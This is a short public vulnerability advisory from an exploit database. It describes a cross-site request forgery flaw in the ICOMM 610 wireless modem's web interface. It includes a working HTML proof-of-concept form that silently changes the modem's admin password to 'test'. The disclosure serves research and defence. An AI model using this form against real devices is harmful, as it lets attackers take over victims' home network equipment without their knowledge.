ICOMM 610 Wireless Modem CSRF Vulnerability

2014.04.03
Credit: Blessen Thomas
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability Google dork : N/A Date : 02/04/2014 Exploit Author : Blessen Thomas Vendor Homepage : http://www.icommtele.com/ Software Link : N/A Version : ICOMM 610 Tested on : Device software version 01.01.08.991 (10/01/2010) Type of Application : Modem Web Application CVE : N/A Cross Site Request Forgery It was observed that this modem's Web Application , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. At attacker could change the password of the victim's account without the victim's knowledge as the application is not having a security token implemented. The Modem's application is not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password: In the POC the IP address in the POST is the modems IP address. <html> <!-- CSRF PoC ---> <body> <form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGXtamp=1396366701157" method="POST"> <input type="hidden" name="PasswdEnable" value="on" /> <input type="hidden" name="New_Passwd" value="test" /> <input type="hidden" name="Confirm_New_Passwd" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top